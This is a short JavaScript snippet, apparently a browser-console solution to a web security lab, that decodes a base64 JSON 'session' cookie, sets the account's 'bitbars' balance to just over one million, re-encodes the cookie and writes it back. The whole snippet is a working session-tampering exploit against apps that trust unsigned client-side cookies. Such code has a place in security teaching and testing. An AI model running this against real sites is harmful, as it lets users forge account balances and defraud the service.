(function() {
	function getCookie(key) {
  const value = "; " + document.cookie;
  const parts = value.split("; " + key + "=");
	  if (parts.length == 2) return parts.pop().split(";").shift();
	  // "{name}={value}; {name}={value}; ..."
	};
	let session_str = getCookie('session')
	// atob stands for ASCII to binary.
	let session= JSON.parse(atob(session_str));
	// increment the bitbars value to 1e+6 = 1 million
	session.account.bitbars = 1e+6 + 1;
	// Overwrite the "session" cookie.
	// btoa stands for binary to ASCII.
	document.cookie = "session=" + btoa(JSON.stringify(session));
})();
clear();